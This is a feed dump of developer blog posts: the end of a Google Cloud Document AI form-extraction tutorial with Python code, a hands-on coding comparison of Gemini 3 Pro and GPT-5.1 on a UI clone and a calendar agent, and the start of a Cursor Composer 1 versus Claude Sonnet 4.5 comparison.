    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;form_doc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc&lt;/span&gt;  &lt;span class="c1"&gt;# from the previous example. see above
&lt;/span&gt;
&lt;span class="n"&gt;fields&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;page&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;form_doc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;page&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;form_fields&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text_anchor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text_anchor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;conf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;confidence&lt;/span&gt;
        &lt;span class="n"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conf&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conf&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; (conf &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;conf&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the point where a scanned form becomes plain Python data. From here, you can push the fields into BigQuery, Firestore, or any other service you use on GCP.&lt;/p&gt;
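&lt;p&gt;As a minimal sketch of that last step, here's one way to collapse the &lt;code&gt;(name, value, confidence)&lt;/code&gt; tuples into a single record before loading it anywhere. The 0.7 confidence threshold and the sample fields are made up for illustration, not Document AI defaults:&lt;/p&gt;

```python
def fields_to_record(fields, min_confidence=0.7):
    """Collapse (name, value, confidence) tuples into one dict,
    dropping fields the processor wasn't confident about."""
    record = {}
    for name, value, conf in fields:
        if conf >= min_confidence:
            # Later duplicates overwrite earlier ones; adjust this if
            # your forms legitimately repeat field names.
            record[name] = value
    return record

# Sample output from the extraction loop above (values are invented):
fields = [
    ("Invoice Number:", "INV-0042", 0.98),
    ("Total:", "$1,250.00", 0.95),
    ("Notes:", "hard to read", 0.35),  # dropped: below the threshold
]

print(fields_to_record(fields))
# → {'Invoice Number:': 'INV-0042', 'Total:': '$1,250.00'}
```

&lt;p&gt;Filtering on confidence early keeps obviously bad OCR reads out of your downstream store.&lt;/p&gt;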

&lt;p&gt;This is just a start, and there's a lot more to it. Visit the &lt;a href="https://cloud.google.com/document-ai" rel="noopener noreferrer"&gt;documentation&lt;/a&gt; to learn more.&lt;/p&gt;

&lt;p&gt;Here's a quick introduction to Google Cloud Document AI. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/F_jyoe1lQhg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;If you think of any other handy AI tools that I haven't covered in this article, do share them in the comments section below. ✌️&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;So, that is it for this article. Thank you so much for reading! 🎉🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbo0rn1n2pcuvbtd13m.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbo0rn1n2pcuvbtd13m.gif" alt="Bye Bye Ryan Gosling GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>opensource</category>
      <category>rag</category>
      <category>productivity</category>
    </item>
    <item>
      <title>✨Gemini 3 Pro vs GPT 5.1: Which One Codes Better? 🚀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Tue, 25 Nov 2025 14:02:17 +0000</pubDate>
      <link>https://forem.com/composiodev/gemini-3-pro-vs-gpt-51-which-one-codes-better-1nld</link>
      <guid>https://forem.com/composiodev/gemini-3-pro-vs-gpt-51-which-one-codes-better-1nld</guid>
      <description>&lt;p&gt;Gemini 3 Pro just dropped, and it is already getting a lot of attention for its reasoning and long context abilities.&lt;/p&gt;

&lt;p&gt;But now, the natural question is, "How well does it code?"&lt;/p&gt;

&lt;p&gt;And does it actually outperform GPT 5.1 Codex, which, in my tests, has been the best so far (better than Claude 4.5 Sonnet) on real tasks?&lt;/p&gt;

&lt;p&gt;To find out, I put it side by side with GPT 5.1 and tested both models on two fundamental tasks: a UI build and a complete agent workflow.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqhs1vxfwei2fuz6ho4r.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqhs1vxfwei2fuz6ho4r.gif" alt="Let's Go GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will go through the results in a moment, but first, let's have a quick TL;DR and a refresher on Gemini 3.&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you want a quick take, here is how both models performed in the test:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Gemini 3 Pro handled both the UI task and the agent build more cleanly, requiring very few follow-ups.&lt;/li&gt;
&lt;li&gt;The most significant difference showed up in the agent test, where Gemini 3 Pro actually followed the documentation and built it well, while GPT-5.1 had a few issues with the agent implementation.&lt;/li&gt;
&lt;li&gt;Even though in our test it's not very obvious, for everyday coding, Gemini 3 Pro feels like the safer bet.&lt;/li&gt;
&lt;li&gt;Latency is higher than GPT-5.1 Codex's and can be frustrating for minor fixes.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you are doing real coding or building agents, Gemini 3 Pro is the better choice right now.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; The goal of this test is to show how much of a jump Gemini 3 Pro is compared to the best models we had before its release.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Brief on Gemini 3 Pro
&lt;/h2&gt;

&lt;p&gt;Gemini 3 was released on November 18th with state-of-the-art reasoning and, unlike most Google models, was pushed directly to Search with no waiting period or beta testing.&lt;/p&gt;

&lt;p&gt;Gemini 3 is Google's most intelligent model family to date and is state-of-the-art (SOTA) across a variety of benchmarks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvog83hggtz5on1xk0weu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvog83hggtz5on1xk0weu.png" alt="Gemini 3 Pro model stats"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, this model makes almost every model we had until now, including GPT-5.1 and Claude 4.5 Sonnet, look outdated. The difference in the stats is just insane.&lt;/p&gt;

&lt;p&gt;Of these, here are the numbers I find most incredible:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;LMArena Elo: 1501 (crossing GPT-5.1 and Claude Sonnet 4.5)&lt;/li&gt;
&lt;li&gt;Humanity's Last Exam: 37.5% without tools (&lt;strong&gt;hardest&lt;/strong&gt; AGI benchmark available)&lt;/li&gt;
&lt;li&gt;GPQA Diamond: 91.9% (PhD-level science reasoning)&lt;/li&gt;
&lt;li&gt;AIME 2025: 95% (high school mathematics)&lt;/li&gt;
&lt;li&gt;MathArena Apex: 23.4% (new state-of-the-art)&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;"Gemini 1 introduced native multimodality and long context to help AI understand the world. Gemini 2 added thinking, reasoning and tool use to create a foundation for agents.&lt;/p&gt;

&lt;p&gt;Now, Gemini 3 brings these capabilities together – so you can bring any idea to life."&lt;/p&gt;

&lt;p&gt;~ Google Deepmind&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fext9see4c8iy5ijiotgj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fext9see4c8iy5ijiotgj.png" alt="Google Deepmind claim on Gemini 3"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In other words, it combines the strengths of the earlier Gemini models.&lt;/p&gt;

&lt;p&gt;Talking about its specs, it comes with a huge 1M input token context window and an output token limit of 64K.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🤔 &lt;strong&gt;What's the difference from Gemini 2.5 Pro?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Specs are almost the same. Both 2.5 Pro and 3 Pro give you about a 1M input window, 64K output and full multimodal support. But Gemini 3 Pro is a clear upgrade in &lt;strong&gt;how it thinks&lt;/strong&gt; with that context. It scores roughly 10 to 20 per cent higher on many reasoning benchmarks, takes a massive jump on complex tests like ARC-AGI-2 and SimpleQA, and performs better at long-context retrieval at the 1M scale.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9zge5q1715wnz0hmynfm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9zge5q1715wnz0hmynfm.png" alt="Gemini 3 hallucination"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hallucination rate is only marginally better than Gemini 2.5 Pro's, and Claude still leads by a significant margin on this metric; it should've been better. We will test it shortly.&lt;/p&gt;

&lt;p&gt;Google is also clearly tuning this thing for real "agent"-style workflows, not just chat. In practice, that means Gemini 3 Pro is built to run tools, browse, execute code, and integrate into your agentic workflows.&lt;/p&gt;

&lt;p&gt;Google has launched it everywhere from day one, which gives you an idea of how confident they are in this model.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mb3qk7tzvr4y7xb37ur.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mb3qk7tzvr4y7xb37ur.png" alt="Gemini 3 availability"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Alongside Gemini 3 Pro, Google has also announced &lt;strong&gt;Deep Think Mode&lt;/strong&gt;, which isn't public yet. It uses extended reasoning chains to work through complex problems, like taking a moment to think before answering, and it improves on the raw Gemini 3 Pro:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Humanity's Last Exam: 41.0% (vs. 37.5% with standard Gemini 3 Pro)&lt;/li&gt;
&lt;li&gt;GPQA Diamond: 93.8% (vs. 91.9% with Gemini 3 Pro)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tezrky7jb0if43z5t6z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tezrky7jb0if43z5t6z.png" alt="Gemini 3 Deep Think"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;They are running safety checks before the public release to ensure it isn't misused.&lt;/p&gt;

&lt;p&gt;To learn more about the model, see its model card here: &lt;a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-Pro-Model-Card.pdf" rel="noopener noreferrer"&gt;Gemini 3 Pro Model Card&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Comparison
&lt;/h2&gt;

&lt;p&gt;Now, let's start with the coding test. We will be comparing Gemini 3 Pro with GPT-5.1 on two tasks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;UI Test:&lt;/strong&gt; I've already seen dozens of videos and demos praising Gemini 3 for its frontend coding, so we will run one to see how well it handles a basic task.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Building an Agent:&lt;/strong&gt; We will make an agent from scratch, as it's also a model known to be great at agentic workflows.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1. UI Test - Clone Windows 11
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/b394169b45a1f8da947da6dcec18dc70" rel="noopener noreferrer"&gt;Prompt - UI Test&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Response from Gemini 3 Pro:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/3f82d6037608b5212df462ea993ba231" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Y8hQdr54AZ0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This is by far the best response I've gotten from any AI model to this prompt to date. This is just too good. The overall feel does resemble Windows 11. The choice of icons could have been better, but the overall look and feel are really, really close.&lt;/p&gt;

&lt;p&gt;On this question, I'm not looking at how the model implements logic, but rather its pure frontend skills, and this one has done it well. Also, the wallpaper-changing feature is cool and works.&lt;/p&gt;

&lt;p&gt;It took about 10 minutes to implement it all. The total output token usage was around 30K, including the README, LICENSE, and a few other document files it generated on its own. So, be careful when using YOLO mode in Gemini CLI. 😑&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42sdr8azbqpzanocdpbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42sdr8azbqpzanocdpbi.png" alt="Gemini 3 token usage coding UI problem"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response from GPT-5.1 codex:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/e8ec4a2072f15aa14fef9cfde65ec439" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/09WhZpqVl-U"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This is super close to Gemini's implementation, but there's a lot of stuff that feels missing and could be improved.&lt;/p&gt;

&lt;p&gt;Even though the look and feel of Gemini 3 Pro's output is much better, GPT-5.1's code for this task is better than Gemini 3 Pro's. If you look at how it's structured and how types are declared, it's much cleaner.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Building a Calendar Agent
&lt;/h3&gt;

&lt;p&gt;To build the agent, let's use something different. This time, we will be using Composio's &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;Tool Router (Beta)&lt;/a&gt;, which automatically discovers, authenticates, and executes the right tool for any task without you having to manage authentication and wire everything per integration. 🔥&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💁 Prompt:&lt;/strong&gt; You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/7b44bd642c470d4a0e76343721a6e05b" rel="noopener noreferrer"&gt;Prompt - Agent Coding&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Response from Gemini 3 Pro:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/595a4570477bee4c99c4872f0801037d" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/N6-iAr6Zu5I"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This works. It's not the best implementation with the best-written code style, but it simply works. Minimal yet functional. It's fascinating how well this model understands the context from the provided link and finds all the pieces it needs to put together.&lt;/p&gt;

&lt;p&gt;There are still many type issues and a few implementation problems; all in all, it's hanging by a thread, yet surprisingly, it just works.&lt;/p&gt;

&lt;p&gt;In terms of time, it took about &lt;strong&gt;5 minutes&lt;/strong&gt; to build this entire agent. And, just to be clear, it's not a one-shot; I had to help it with a little bit of setup.&lt;/p&gt;

&lt;p&gt;The entire test took around 14K output tokens, and since the prompt I gave is very verbose, the input token count is significantly higher.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkofqu50wxiw5mtc3h33.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkofqu50wxiw5mtc3h33.png" alt="Gemini 3 token usage coding agent problem"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response from GPT-5.1:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's the first output it gave me:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/O4lknG9RzbM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;For real, it just mocked the entire agent route. It didn't use the Composio Tool Router at all. This is so disappointing; all it did was create the UI and mock the whole agent implementation.&lt;/p&gt;

&lt;p&gt;You can find the agent route code that it generated here: &lt;a href="https://gist.github.com/shricodev/0733c30fb7f90a5cf15ebb3227ddeecf" rel="noopener noreferrer"&gt;Link&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, I had to copy and paste some parts of the tool router documentation manually, and with a lot of hand-holding this time and showing the Gemini 3 code as a reference, I got it somewhat working. But still, the UI is messed up, and the cards don't show.&lt;/p&gt;

&lt;p&gt;Here's the final output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Rz7tr5rQS2w"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/c2918c741dce9dbd2288b7c39b45cfa5" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27iz2yk4ccdgnnj8pu36.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27iz2yk4ccdgnnj8pu36.png" alt="OpenAI GPT-5.1 usage coding the agent"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Gemini 3 Pro kind of lived up to the hype in these tests. As for the code quality, both completed the test in one go for the most part, and the code is modular and follows best practices. However, sometimes GPT-5.1 provided much better code than Gemini 3 Pro. 🤷‍♂️&lt;/p&gt;

&lt;p&gt;Gemini 3 is a lot better at agent-style workflows, and even UI work, and it shows. I'm really looking forward to seeing how Deep Think mode improves things once it rolls out.&lt;/p&gt;

&lt;p&gt;If you're still curious to learn more, there's one blog that I recommend that you go through, "&lt;a href="https://www.oneusefulthing.org/p/three-years-from-gpt-3-to-gemini" rel="noopener noreferrer"&gt;Three Years from GPT-3 to Gemini 3&lt;/a&gt;" by Ethan Mollick, that walks you through the whole AI arc in these years and gives you some intuition on what's changed, beyond just the benchmark numbers.&lt;/p&gt;

&lt;p&gt;It's still early, and results may vary with different prompts, but for practical coding tasks, Gemini 3 Pro is a top model.&lt;/p&gt;

&lt;p&gt;Try it with your own projects and you will see what I mean. Share your results if you test it on something real. ✌️&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvmt7tsf2i60yuvw58wg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvmt7tsf2i60yuvw58wg.gif" alt="Peace out GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>🧠 Cursor Composer 1 vs Claude 4.5 Agent Build Comparison ⚡</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Wed, 12 Nov 2025 13:45:23 +0000</pubDate>
      <link>https://forem.com/composiodev/cursor-composer-1-vs-claude-45-agent-build-comparison-2big</link>
      <guid>https://forem.com/composiodev/cursor-composer-1-vs-claude-45-agent-build-comparison-2big</guid>
      <description>&lt;p&gt;The AI coding race is heating up again. After OpenAI, Anthropic, and Google, Cursor has stepped into the game with its new model, Composer 1, a coding-focused agent model that’s said to be 4x faster than other models with similar intelligence. 🤨&lt;/p&gt;

&lt;p&gt;It’s said to output code at lightning speed, reason through large contexts, and even outperform models like GPT-5 and Claude Sonnet in engineering workflows.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fom4sytnsmuql4t1cf0n1.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fom4sytnsmuql4t1cf0n1.gif" alt="Sus GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That’s a bold claim, so I decided to test it myself. In this post, we’ll see how Composer 1 performs when building an actual agent and to make things fair, I’ll put it head-to-head with Claude Sonnet 4.5, one of the most consistent coding models out there.&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the results, here’s a quick rundown of how both models performed in building a simple agent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Composer 1&lt;/strong&gt; produced the most complete implementation and had the fastest output. It coded the entire agent in under 3 minutes, though it needed two small follow-ups.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.5&lt;/strong&gt; also got the job done, but sometimes used outdated API methods, even though I clearly provided the latest documentation for a Python package. It tends to rely more on its training data than the instructions you give it.&lt;/li&gt;
&lt;/ul&gt;

